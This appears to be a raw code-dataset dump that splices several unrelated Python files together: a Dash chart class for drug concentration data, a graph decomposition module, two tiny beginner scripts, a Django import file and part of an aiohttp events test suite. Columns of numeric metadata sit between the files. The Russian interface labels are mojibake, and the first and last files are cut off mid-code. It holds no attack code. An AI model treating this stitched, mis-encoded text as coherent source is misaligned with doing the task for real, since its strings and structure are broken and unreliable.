fig.add_trace(go.Scatter(x=[time[np.argmax(df_t)]], y = [max(df_t)], mode='markers', name='ะะฐะบัะธะผัะผ T',
marker=dict(size = 15, color = 'violet')))
fig.add_trace(go.Scatter(x=[time[np.argmin(df_t)]], y = [min(df_t)], mode='markers', name='ะะธะฝะธะผัะผ T',
marker=dict(size = 15, color = 'green')))
fig.add_trace(go.Scatter(x=[time[np.argmax(df_r)]], y = [max(df_r)], mode='markers', name='ะะฐะบัะธะผัะผ R',
marker=dict(size = 15, color = 'violet')))
fig.add_trace(go.Scatter(x=[time[np.argmin(df_r)]], y = [min(df_r)], mode='markers', name='ะะธะฝะธะผัะผ R',
marker=dict(size = 15, color = 'green')))
fig.update_xaxes(title='ะัะตะผั')
fig.update_yaxes(title='ะะพะฝัะตะฝััะฐัะธั',
type='log')
return html.Div([html.Div(html.H1(
children='ะะฑะพะฑัะตะฝะฝัะน ะณัะฐัะธะบ ะทะฐะฒะธัะธะผะพััะธ ะฟัะพะปะพะณะฐัะธัะผะธัะพะฒะฐะฝะฝะพะน ะบะพะฝัะตะฝััะฐัะธะธ ะพั ะฒัะตะผะตะฝะธ'),
style={'text-align': 'center'}),
html.Div([
dcc.Graph(id='concentration_time_r_log_mean', figure=fig)],
style={'width': '78%', 'display': 'inline-block',
'border-color': 'rgb(220, 220, 220)', 'border-style': 'solid', 'padding': '5px'}),
html.Div(dcc.Markdown(children=markdown_text_conc_time_log_mean),
style={'width': '18%', 'float': 'right', 'display': 'inline-block'})],
style={'margin': '100px'}
)
def _generate_concentration_time_linlog_mean(self):
df_r = self.settings[0].concentration_r.mean()
df_t = self.settings[0].concentration_t.mean()
time = df_t.index
def update_graph(yaxis_type_conc_linlog_mean):
fig = go.Figure()
fig.add_trace(go.Scatter(x=time, y=df_r, name='R'))
fig.add_trace(go.Scatter(x=time, y=df_t, name='T'))
fig.add_trace(go.Scatter(x=[time[np.argmax(df_t)]], y = [max(df_t)], mode='markers', name='ะะฐะบัะธะผัะผ T',
marker=dict(size = 15, color = 'violet')))
fig.add_trace(go.Scatter(x=[time[np.argmin(df_t)]], y = [min(df_t)], mode='markers', name='ะะธะฝะธะผัะผ T',
marker=dict(size = 15, color = 'green')))
fig.add_trace(go.Scatter(x=[time[np.argmax(df_r)]], y = [max(df_r)], mode='markers', name='ะะฐะบัะธะผัะผ R',
marker=dict(size = 15, color = 'violet')))
fig.add_trace(go.Scatter(x=[time[np.argmin(df_r)]], y = [min(df_r)], mode='markers', name='ะะธะฝะธะผัะผ R',
marker=dict(size = 15, color = 'green')))
fig.update_xaxes(title='ะัะตะผั')
fig.update_yaxes(title='ะะพะฝัะตะฝััะฐัะธั',
type=yaxis_type_conc_linlog_mean)
return fig
self.app.callback(dash.dependencies.Output('concentration_time_linlog_mean', 'figure'),
[dash.dependencies.Input('yaxis_type_conc_linlog_mean', 'value')])(update_graph)
return html.Div([html.Div(html.H1(children='ะะฑะพะฑัะตะฝะฝัะน ะณัะฐัะธะบ ะทะฐะฒะธัะธะผะพััะธ ะบะพะฝัะตะฝััะฐัะธะธ ะพั ะฒัะตะผะตะฝะธ'),
style={'text-align': 'center'}),
html.Div([
html.Div([
html.Div([dcc.RadioItems(
id='yaxis_type_conc_linlog_mean',
options=[{'label': i, 'value': i}
for i in ['linear', 'log']],
value='linear'
)], style={'width': '48%', 'display': 'inline-block'})
], style={'padding': '5px'}),
dcc.Graph(id='concentration_time_linlog_mean')],
style={'width': '78%', 'display': 'inline-block',
'border-color': 'rgb(220, 220, 220)', 'border-style': 'solid', 'padding': '5px'}),
html.Div(dcc.Markdown(children=markdown_text_conc_time_mean),
style={'width': '18%', 'float': 'right', 'display': 'inline-block'})], style={'margin': '100px'}
)
def _generate_group_mean(self, tr=True):
if tr:
df_t = self.settings[0].concentration_t_1.mean()
df_r = self.settings[0].concentration_r_1.mean()
time = df_t.index
def update_graph(group_mean_type_tr):
fig = go.Figure()
fig.add_trace(go.Scatter(x=time, y=df_t, name='T'))
fig.add_trace(go.Scatter(x=time, y=df_r, name='R'))
fig.add_trace(go.Scatter(x=[time[np.argmax(df_t)]], y = [max(df_t)], mode='markers', name='ะะฐะบัะธะผัะผ T',
marker=dict(size = 15, color = 'violet')))
fig.add_trace(go.Scatter(x=[time[np.argmin(df_t)]], y = [min(df_t)], mode='markers', name='ะะธะฝะธะผัะผ T',
marker=dict(size = 15, color = 'green')))
fig.add_trace(go.Scatter(x=[time[np.argmax(df_r)]], y = [max(df_r)], mode='markers', name='ะะฐะบัะธะผัะผ R',
marker=dict(size = 15, color = 'violet')))
fig.add_trace(go.Scatter(x=[time[np.argmin(df_r)]], y = [min(df_r)], mode='markers', name='ะะธะฝะธะผัะผ R',
marker=dict(size = 15, color = 'green')))
fig.update_xaxes(title='ะัะตะผั')
fig.update_yaxes(type=group_mean_type_tr, title='ะะพะฝัะตะฝััะฐัะธั')
return fig
self.app.callback(dash.dependencies.Output('concentration_time_tr_mean', 'figure'),
dash.dependencies.Input('group_mean_type_tr', 'value'))(update_graph)
return html.Div([html.Div(html.H1(children='ะกัะตะดะฝัั ะบะพะฝัะตะฝััะฐัะธั ะพั ะฒัะตะผะตะฝะธ ะณััะฟะฟะฐ TR'),
style={'text-align': 'center'}),
html.Div([
html.Div([dcc.RadioItems(
id='group_mean_type_tr',
options=[{'label': i, 'value': i}
for i in ['linear', 'log']],
value='linear'
)], style={'width': '48%', 'display': 'inline-block'}),
dcc.Graph(id='concentration_time_tr_mean')],
style={'width': '78%', 'display': 'inline-block',
'border-color': 'rgb(220, 220, 220)', 'border-style': 'solid', 'padding': '5px'}),
html.Div(dcc.Markdown(children=markdown_group_mean_tr),
style={'width': '18%', 'float': 'right', 'display': 'inline-block'})],
style={'margin': '100px'}
)
else:
df_t = self.settings[0].concentration_t_2.mean()
df_r = self.settings[0].concentration_r_2.mean()
time = df_t.index
def update_graph(group_mean_type_rt):
fig = go.Figure()
fig.add_trace(go.Scatter(x=time, y=df_t, name='T'))
fig.add_trace(go.Scatter(x=time, y=df_r, name='R'))
fig.add_trace(go.Scatter(x=[time[np.argmax(df_t)]], y = [max(df_t)], mode='markers', name='ะะฐะบัะธะผัะผ T',
marker=dict(size = 15, color = 'violet')))
fig.add_trace(go.Scatter(x=[time[np.argmin(df_t)]], y = [min(df_t)], mode='markers', name='ะะธะฝะธะผัะผ T',
marker=dict(size = 15, color = 'green')))
fig.add_trace(go.Scatter(x=[time[np.argmax(df_r)]], y = [max(df_r)], mode='markers', name='ะะฐะบัะธะผัะผ R',
marker=dict(size = 15, color = 'violet')))
fig.add_trace(go.Scatter(x=[time[np.argmin(df_r)]], y = [min(df_r)], mode='markers', name='ะะธะฝะธะผัะผ R',
marker=dict(size = 15, color = 'green')))
fig.update_xaxes(title='ะัะตะผั')
fig.update_yaxes(type=group_mean_type_rt, title='ะะพะฝัะตะฝััะฐัะธั')
return fig
self.app.callback(dash.dependencies.Output('concentration_time_rt_mean', 'figure'),
dash.dependencies.Input('group_mean_type_rt', 'value'))(update_graph)
return html.Div([html.Div(html.H1(children='ะกัะตะดะฝัั ะบะพะฝัะตะฝััะฐัะธั ะพั ะฒัะตะผะตะฝะธ ะณััะฟะฟะฐ RT'),
style={'text-align': 'center'}),
html.Div([
html.Div([dcc.RadioItems(
id='group_mean_type_rt',
options=[{'label': i, 'value': i}
for i in ['linear', 'log']],
value='linear'
)], style={'width': '48%', 'display': 'inline-block'}),
dcc.Graph(id='concentration_time_rt_mean')],
style={'width': '78%', 'display': 'inline-block',
'border-color': 'rgb(220, 220, 220)', 'border-style': 'solid', 'padding': '5px'}),
html.Div(dcc.Markdown(children=markdown_group_mean_rt),
style={'width': '18%', 'float': 'right', 'display': 'inline-block'})],
style={'margin': '100px'}
)
def _generate_drug_mean(self):
df_t_1 = self.settings[0].concentration_t_1.mean()
df_t_2 = self.settings[0].concentration_t_2.mean()
df_r_1 = self.settings[0].concentration_r_1.mean()
df_r_2 = self.settings[0].concentration_r_2.mean()
time = df_t_1.index
def update_graph(drug_mean_type):
fig = go.Figure()
fig.add_trace(go.Scatter(x=time, y=(
df_t_1 + df_t_2) / 2, name='T'))
fig.add_trace(go.Scatter(x=time, y=(
df_r_1 + df_r_2) / 2, name='R'))
fig.add_trace(go.Scatter(x=[time[np.argmax((df_t_1 + df_t_2) / 2)]], y = [max((df_t_1 + df_t_2) / 2)],
mode='markers', name='ะะฐะบัะธะผัะผ T',
marker=dict(size = 15, color = 'violet')))
fig.add_trace(go.Scatter(x=[time[np.argmin((df_t_1 + df_t_2) / 2)]], y = [min((df_t_1 + df_t_2) / 2)],
mode='markers', name='ะะธะฝะธะผัะผ T',
marker=dict(size = 15, color = 'green')))
fig.add_trace(go.Scatter(x=[time[np.argmax((df_r_1 + df_r_2) / 2)]], y = [max((df_r_1 + df_r_2) / 2)], mode='markers', name='ะะฐะบัะธะผัะผ R',
marker=dict(size = 15, color = 'violet')))
fig.add_trace(go.Scatter(x=[time[np.argmin((df_r_1 + df_r_2) / 2)]], y = [min((df_r_1 + df_r_2) / 2)], mode='markers', name='ะะธะฝะธะผัะผ R',
marker=dict(size = 15, color = 'green')))
fig.update_xaxes(title='ะัะตะผั')
fig.update_yaxes(type=drug_mean_type, title='ะะพะฝัะตะฝััะฐัะธั')
return fig
self.app.callback(dash.dependencies.Output('drug_mean', 'figure'),
dash.dependencies.Input('drug_mean_type', 'value'))(update_graph)
return html.Div([html.Div(html.H1(children='ะะฑะพะฑัะตะฝะฝัะต ะดะฐะฝะฝัะต ะฟะพ ะดะฒัะผ ะฟัะตะฟะฐัะฐัะฐะผ'),
style={'text-align': 'center'}),
html.Div([html.Div([dcc.RadioItems(
id='drug_mean_type',
options=[{'label': i, 'value': i}
for i in ['linear', 'log']],
value='linear'
)], style={'width': '48%', 'display': 'inline-block'}),
dcc.Graph(id='drug_mean')],
style={'width': '78%', 'display': 'inline-block',
'border-color': 'rgb(220, 220, 220)', 'border-style': 'solid', 'padding': '5px'}),
html.Div(dcc.Markdown(children=markdown_drug_mean),
style={'width': '18%', 'float': 'right', 'display': 'inline-block'})],
style={'margin': '100px'}
)
| 62.222222
| 153
| 0.444626
| 6,043
| 61,040
| 4.303492
| 0.048982
| 0.031762
| 0.053488
| 0.059909
| 0.934054
| 0.916712
| 0.883142
| 0.869684
| 0.841537
| 0.810505
| 0
| 0.02377
| 0.417611
| 61,040
| 980
| 154
| 62.285714
| 0.707784
| 0.000688
| 0
| 0.622517
| 0
| 0
| 0.161584
| 0.017804
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030905
| false
| 0
| 0.012141
| 0.001104
| 0.081678
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
02560728918e83670ec8d88d9fd19f62ed3cbdeb
| 4,577
|
py
|
Python
|
ego/decomposition/positive_and_negative.py
|
fabriziocosta/EGO
|
d89e88183cce1ff24dca9333c09fa11597a45c7a
|
[
"MIT"
] | null | null | null |
ego/decomposition/positive_and_negative.py
|
fabriziocosta/EGO
|
d89e88183cce1ff24dca9333c09fa11597a45c7a
|
[
"MIT"
] | null | null | null |
ego/decomposition/positive_and_negative.py
|
fabriziocosta/EGO
|
d89e88183cce1ff24dca9333c09fa11597a45c7a
|
[
"MIT"
] | 1
|
2022-01-24T09:53:20.000Z
|
2022-01-24T09:53:20.000Z
|
#!/usr/bin/env python
"""Provides scikit interface."""
from toolz import curry
import numpy as np
from ego.component import GraphComponent, serialize, get_subgraphs_from_node_components
@curry
def positive_and_negative(graph, ktop=0, part_importance_estimator=None):
codes, fragments = part_importance_estimator.encoding_func(graph)
scores = [part_importance_estimator.importance_dict.get(code, 0) for code in codes]
if ktop > len(scores) - 1:
ktop = len(scores) - 1
ids = np.argsort(scores)
positive_components = [set(fragments[id].nodes()) for id in ids[-ktop:]]
negative_components = [set(fragments[id].nodes()) for id in ids[:ktop]]
return list(positive_components), list(negative_components)
@curry
def positive_decomposition(graph, ktop=0, part_importance_estimator=None):
res = positive_and_negative(
graph,
ktop=ktop,
part_importance_estimator=part_importance_estimator)
positive_components, negative_components = res
return positive_components
@curry
def negative_decomposition(graph, ktop=0, part_importance_estimator=None):
res = positive_and_negative(
graph,
ktop=ktop,
part_importance_estimator=part_importance_estimator)
positive_components, negative_components = res
return negative_components
@curry
def positive_and_negative_decomposition(graph, ktop=0, part_importance_estimator=None):
res = positive_and_negative(
graph,
ktop=ktop,
part_importance_estimator=part_importance_estimator)
positive_components, negative_components = res
return positive_components + negative_components
@curry
def decompose_positive(graph_component, ktop=0, part_importance_estimator=None):
new_subgraphs_list = []
new_signatures_list = []
for subgraph, signature in zip(graph_component.subgraphs, graph_component.signatures):
components = positive_decomposition(
subgraph, ktop=ktop, part_importance_estimator=part_importance_estimator)
new_subgraphs = get_subgraphs_from_node_components(
graph_component.graph, components)
new_signature = serialize(['positive',
ktop], signature)
new_signatures = [new_signature] * len(new_subgraphs)
new_subgraphs_list += new_subgraphs
new_signatures_list += new_signatures
gc = GraphComponent(
graph=graph_component.graph,
subgraphs=new_subgraphs_list,
signatures=new_signatures_list)
return gc
@curry
def decompose_negative(graph_component, ktop=0, part_importance_estimator=None):
new_subgraphs_list = []
new_signatures_list = []
for subgraph, signature in zip(graph_component.subgraphs, graph_component.signatures):
components = negative_decomposition(
subgraph, ktop=ktop, part_importance_estimator=part_importance_estimator)
new_subgraphs = get_subgraphs_from_node_components(
graph_component.graph, components)
new_signature = serialize(['negative',
ktop], signature)
new_signatures = [new_signature] * len(new_subgraphs)
new_subgraphs_list += new_subgraphs
new_signatures_list += new_signatures
gc = GraphComponent(
graph=graph_component.graph,
subgraphs=new_subgraphs_list,
signatures=new_signatures_list)
return gc
@curry
def decompose_positive_and_negative(graph_component, ktop=0, part_importance_estimator=None):
new_subgraphs_list = []
new_signatures_list = []
for subgraph, signature in zip(graph_component.subgraphs, graph_component.signatures):
components = positive_and_negative_decomposition(
subgraph, ktop=ktop, part_importance_estimator=part_importance_estimator)
new_subgraphs = get_subgraphs_from_node_components(
graph_component.graph, components)
new_signature = serialize(['positive_and_negative',
ktop], signature)
new_signatures = [new_signature] * len(new_subgraphs)
new_subgraphs_list += new_subgraphs
new_signatures_list += new_signatures
gc = GraphComponent(
graph=graph_component.graph,
subgraphs=new_subgraphs_list,
signatures=new_signatures_list)
return gc
def pst(*args, **kargs):
return decompose_positive(*args, **kargs)
def ngt(*args, **kargs):
return decompose_negative(*args, **kargs)
def pstngt(*args, **kargs):
return decompose_positive_and_negative(*args, **kargs)
| 36.616
| 93
| 0.719685
| 509
| 4,577
| 6.125737
| 0.129666
| 0.094291
| 0.154907
| 0.042656
| 0.842207
| 0.801796
| 0.780629
| 0.768762
| 0.768762
| 0.768762
| 0
| 0.00274
| 0.202753
| 4,577
| 125
| 94
| 36.616
| 0.85174
| 0.010269
| 0
| 0.67
| 0
| 0
| 0.008177
| 0.004641
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.18
| 0.03
| 0.38
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
026a64c83a37bffdbf432fe20a0716dd9d09fa5a
| 189
|
py
|
Python
|
generators_comprehension/list_comphresension/listcomp.py
|
kumarvgit/python3
|
318c5e7503fafc9c60082fa123e2930bd82a4ec9
|
[
"MIT"
] | null | null | null |
generators_comprehension/list_comphresension/listcomp.py
|
kumarvgit/python3
|
318c5e7503fafc9c60082fa123e2930bd82a4ec9
|
[
"MIT"
] | null | null | null |
generators_comprehension/list_comphresension/listcomp.py
|
kumarvgit/python3
|
318c5e7503fafc9c60082fa123e2930bd82a4ec9
|
[
"MIT"
] | null | null | null |
print(__file__)
numbers = range(1, 6)
# list comprehesnion
squares = [number ** 2 for number in numbers]
# set comprehesnion
# squares = {number ** 2 for number in numbers}
print(squares)
| 21
| 47
| 0.719577
| 26
| 189
| 5.076923
| 0.538462
| 0.30303
| 0.393939
| 0.409091
| 0.681818
| 0.681818
| 0.681818
| 0.681818
| 0
| 0
| 0
| 0.025478
| 0.169312
| 189
| 8
| 48
| 23.625
| 0.815287
| 0.433862
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
65fc696191700ab451569faf82b46c35dee280f4
| 111
|
py
|
Python
|
Python exercicios/operador.py
|
andrelopes1977/python-exercicios
|
06f9b5aa0defeda3030a861a0a9f16b4769bc810
|
[
"MIT"
] | null | null | null |
Python exercicios/operador.py
|
andrelopes1977/python-exercicios
|
06f9b5aa0defeda3030a861a0a9f16b4769bc810
|
[
"MIT"
] | null | null | null |
Python exercicios/operador.py
|
andrelopes1977/python-exercicios
|
06f9b5aa0defeda3030a861a0a9f16b4769bc810
|
[
"MIT"
] | null | null | null |
x = 2
y = 3
z = 4
print(x == y)
print(x > y)
print(x < y)
print(x == y and x == z)
print(x == y or x == z)
| 8.538462
| 24
| 0.45045
| 27
| 111
| 1.851852
| 0.333333
| 0.6
| 0.7
| 0.72
| 0.56
| 0.56
| 0.56
| 0.56
| 0.56
| 0
| 0
| 0.04
| 0.324324
| 111
| 13
| 25
| 8.538462
| 0.626667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.625
| 1
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
5a1de765415938b1b2c2997c6378db19f6ed4d5e
| 698
|
py
|
Python
|
share/models/__init__.py
|
felliott/SHARE
|
8fd60ff4749349c9b867f6188650d71f4f0a1a56
|
[
"Apache-2.0"
] | null | null | null |
share/models/__init__.py
|
felliott/SHARE
|
8fd60ff4749349c9b867f6188650d71f4f0a1a56
|
[
"Apache-2.0"
] | null | null | null |
share/models/__init__.py
|
felliott/SHARE
|
8fd60ff4749349c9b867f6188650d71f4f0a1a56
|
[
"Apache-2.0"
] | null | null | null |
# NOTE: The order of these imports actually matter
from share.models.core import * # noqa
from share.models.ingest import * # noqa
from share.models.meta import * # noqa
from share.models.change import * # noqa
from share.models.agents import * # noqa
from share.models.creative import * # noqa
from share.models.base import ExtraData # noqa
from share.models.registration import * # noqa
from share.models.identifiers import * # noqa
from share.models.relations import * # noqa
from share.models.banner import * # noqa
from share.models.ingest import * # noqa
from share.models.jobs import * # noqa
from share.models.sources import * # noqa
from share.models.celery import * # noqa
| 41.058824
| 50
| 0.749284
| 99
| 698
| 5.282828
| 0.282828
| 0.258126
| 0.43021
| 0.508604
| 0.644359
| 0.214149
| 0.214149
| 0.214149
| 0.214149
| 0.214149
| 0
| 0
| 0.163324
| 698
| 16
| 51
| 43.625
| 0.895548
| 0.176218
| 0
| 0.133333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
5a2a38e95c45b8bc3c7ba901dc2ae4101f089560
| 75,553
|
py
|
Python
|
py/tests/test_events.py
|
samuelcolvin/nosht
|
9e4d9bea8ff6bfae86cae948cc3028ccc68d0188
|
[
"MIT"
] | 26
|
2018-07-28T23:11:27.000Z
|
2022-02-09T13:40:33.000Z
|
py/tests/test_events.py
|
samuelcolvin/nosht
|
9e4d9bea8ff6bfae86cae948cc3028ccc68d0188
|
[
"MIT"
] | 336
|
2018-05-25T17:57:00.000Z
|
2022-03-11T23:24:36.000Z
|
py/tests/test_events.py
|
samuelcolvin/nosht
|
9e4d9bea8ff6bfae86cae948cc3028ccc68d0188
|
[
"MIT"
] | 4
|
2018-07-18T08:37:19.000Z
|
2022-01-31T14:42:48.000Z
|
import re
from datetime import datetime, timedelta, timezone
from decimal import Decimal
import pytest
import pytz
from aiohttp import FormData
from pytest_toolbox.comparison import AnyInt, CloseToNow, RegexStr
from shared.utils import waiting_list_sig
from .conftest import Factory, create_image
async def test_event_public(cli, url, factory: Factory, db_conn):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event(
status='published', location_name='Testing Location', location_lat=51.5, location_lng=-0.5
)
cat_slug, event_slug = await db_conn.fetchrow(
'SELECT cat.slug, e.slug FROM events AS e JOIN categories cat on e.category = cat.id WHERE e.id=$1',
factory.event_id,
)
r = await cli.get(url('event-get-public', category=cat_slug, event=event_slug))
assert r.status == 200, await r.text()
data = await r.json()
assert data == {
'ticket_types': [
{'mode': 'donation', 'name': 'Standard', 'price': 10.0},
{'mode': 'ticket', 'name': 'Standard', 'price': None},
],
'event': {
'id': factory.event_id,
'category_id': factory.category_id,
'name': 'The Event Name',
'image': 'https://www.example.org/main.png',
'secondary_image': None,
'youtube_video_id': None,
'short_description': RegexStr(r'.*'),
'long_description': RegexStr(r'.*'),
'description_intro': RegexStr(r'.*'),
'description_image': None,
'external_ticket_url': None,
'external_donation_url': None,
'allow_tickets': True,
'allow_donations': False,
'category_content': None,
'location': {'name': 'Testing Location', 'lat': 51.5, 'lng': -0.5},
'start_ts': '2032-06-28T19:00:00',
'tz': 'BST',
'duration': 3600,
'tickets_available': None,
'host_id': factory.user_id,
'host_name': 'Frank Spencer',
'ticket_extra_help_text': None,
'ticket_extra_title': None,
'allow_marketing_message': None,
'booking_trust_message': None,
'cover_costs_message': None,
'cover_costs_percentage': None,
'terms_and_conditions_message': None,
},
'existing_tickets': 0,
'on_waiting_list': False,
}
async def test_event_wrong_slug(cli, url, factory: Factory):
await factory.create_company()
r = await cli.get(url('event-get-public', category='foobar', event='snap'))
assert r.status == 404, await r.text()
async def test_event_not_public(cli, url, factory: Factory, db_conn):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event(public=False, status='published')
cat_slug, event_slug = await db_conn.fetchrow(
'SELECT cat.slug, e.slug FROM events AS e JOIN categories cat on e.category = cat.id WHERE e.id=$1',
factory.event_id,
)
r = await cli.get(url('event-get-public', category=cat_slug, event=event_slug))
assert r.status == 404, await r.text()
assert {'message': 'event not found'} == await r.json()
async def test_private_event_good(cli, url, factory: Factory, db_conn, settings):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event(public=False, status='published')
event_link = await db_conn.fetchval(
"""
SELECT event_link(cat.slug, e.slug, e.public, $2)
FROM events AS e JOIN categories cat on e.category = cat.id WHERE e.id=$1
""",
factory.event_id,
settings.auth_key,
)
_, cat_slug, event_slug, sig = event_link.strip('/').split('/')
r = await cli.get(url('event-get-private', category=cat_slug, event=event_slug, sig=sig))
assert r.status == 200, await r.text()
data = await r.json()
assert data['event']['id'] == factory.event_id
async def test_private_event_bad_sig(cli, url, factory: Factory, db_conn, settings):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event(public=False, status='published')
event_link = await db_conn.fetchval(
"""
SELECT event_link(cat.slug, e.slug, e.public, $2)
FROM events AS e JOIN categories cat on e.category = cat.id WHERE e.id=$1
""",
factory.event_id,
settings.auth_key,
)
_, cat_slug, event_slug, sig = event_link.strip('/').split('/')
r = await cli.get(url('event-get-private', category=cat_slug, event=event_slug, sig=sig + 'x'))
assert r.status == 404, await r.text()
assert {'message': 'event not found'} == await r.json()
async def test_bread_browse(cli, url, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event(public=False, status='published')
london = pytz.timezone('Europe/London')
await factory.create_event(name='second event', start_ts=london.localize(datetime(2032, 6, 30, 0, 0)))
await login()
r = await cli.get(url('event-browse'))
assert r.status == 200, await r.text()
data = await r.json()
assert data == {
'items': [
{
'id': AnyInt(),
'name': 'second event',
'category': 'Supper Clubs',
'status': 'pending',
'highlight': False,
'start_ts': '2032-06-30T00:00:00',
'duration': 3600,
},
{
'id': AnyInt(),
'name': 'The Event Name',
'category': 'Supper Clubs',
'status': 'published',
'highlight': False,
'start_ts': '2032-06-28T19:00:00',
'duration': 3600,
},
],
'count': 2,
'pages': 1,
}
async def test_bread_retrieve(cli, url, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await factory.create_event(
public=False,
status='published',
youtube_video_id='abcxyz',
short_description='xxx',
long_description='yyy',
description_intro='zzzz',
)
await login()
r = await cli.get(url('event-retrieve', pk=factory.event_id))
assert r.status == 200, await r.text()
data = await r.json()
assert data == {
'id': factory.event_id,
'name': 'The Event Name',
'category': 'Supper Clubs',
'status': 'published',
'highlight': False,
'allow_donations': False,
'allow_tickets': True,
'start_ts': '2032-06-28T19:00:00',
'timezone': 'Europe/London',
'duration': 3600,
'cat_id': factory.category_id,
'public': False,
'image': None,
'secondary_image': None,
'ticket_limit': None,
'donation_target': None,
'location_name': None,
'location_lat': None,
'location_lng': None,
'youtube_video_id': 'abcxyz',
'short_description': 'xxx',
'long_description': 'yyy',
'description_intro': 'zzzz',
'description_image': None,
'external_ticket_url': None,
'external_donation_url': None,
'host': factory.user_id,
'host_name': 'Frank Spencer',
'link': '/pvt/supper-clubs/the-event-name/8d2a9334aa29f2151668a54433df2e9d/',
}
async def test_bread_browse_host(cli, url, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user(role='host')
await factory.create_event()
u2 = await factory.create_user(email='u2@example.org')
await factory.create_event(host_user_id=u2, name='another event')
await login()
r = await cli.get(url('event-browse'))
assert r.status == 200, await r.text()
data = await r.json()
assert data['count'] == 1
assert data['pages'] == 1
assert len(data['items']) == 1
async def test_bread_retrieve_host(cli, url, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user(role='host')
await factory.create_event()
u2 = await factory.create_user(email='u2@example.org')
e2 = await factory.create_event(host_user_id=u2, name='another event')
await login()
r = await cli.get(url('event-retrieve', pk=factory.event_id))
assert r.status == 200, await r.text()
r = await cli.get(url('event-retrieve', pk=e2))
assert r.status == 404, await r.text()
async def test_event_categories(cli, url, factory: Factory, login):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await login()
r = await cli.get(url('event-categories'))
assert r.status == 200, await r.text()
data = await r.json()
assert data == {
'categories': [
{
'id': factory.category_id,
'name': 'Supper Clubs',
'host_advice': None,
'event_type': 'ticket_sales',
'suggested_price': None,
},
],
}
async def test_create_event(cli, url, db_conn, factory: Factory, login, dummy_server):
await factory.create_company()
await factory.create_cat()
await factory.create_user()
await login()
data = dict(
name='foobar',
category=factory.category_id,
location={'lat': 50, 'lng': 0, 'name': 'London'},
date={'dt': datetime(2032, 2, 1, 19, 0).strftime('%s'), 'dur': 7200},
timezone='Europe/London',
long_description='# title\nI love to **party**',
description_intro='some intro texxxt',
youtube_video_id='abcxyz',
)
assert 0 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
assert 0 == await db_conn.fetchval('SELECT COUNT(*) FROM ticket_types')
r = await cli.json_post(url('event-add'), data=data)
assert r.status == 201, await r.text()
assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM events')
data = await r.json()
event = dict(await db_conn.fetchrow('SELECT * FROM events'))
event_id = event.pop('id')
assert data == {'status': 'ok', 'pk': event_id}
assert event == {
'category': factory.category_id,
'status': 'published',
'host': factory.user_id,
'name': 'foobar',
'slug': 'foobar',
'highlight': False,
'allow_donations': False,
'allow_tickets': True,
'start_ts': datetime(2032, 2, 1, 19, 0, tzinfo=timezone.utc),
'timezone': 'Europe/London',
'duration': timedelta(seconds=7200),
'youtube_video_id': 'abcxyz',
'short_description': 'title I love to party',
'long_description': '# title\nI love to **party**',
'description_intro': 'some intro texxxt',
'description_image': None,
'external_ticket_url': None,
'external_donation_url': None,
'public': True,
'location_name': 'London',
'location_lat': 50.0,
'location_lng': 0.0,
'ticket_limit': None,
'donation_target': None,
'tickets_taken': 0,
'image': None,
'secondary_image': None,
}
assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM ticket_types where mode=$1', 'ticket')
tt = dict(await db_conn.fetchrow('SELECT event, name, price, slots_used, active FROM ticket_types'))
assert tt == {
'event': event_id,
'name': 'Standard',
'price': None,
'slots_used': 1,
'active': True,
}
assert len(dummy_server.app['emails']) == 1
email = dummy_server.app['emails'][0]
# debug(email)
assert email['Subject'] == 'Update: Frank Spencer created an event "foobar"'
assert email['part:text/plain'] == (
f'Testing update:\n'
f'\n'
f'Event "foobar" (Supper Clubs) created by "Frank Spencer" (admin), click the link below to view the event.\n'
f'\n'
f'<div class="button">\n'
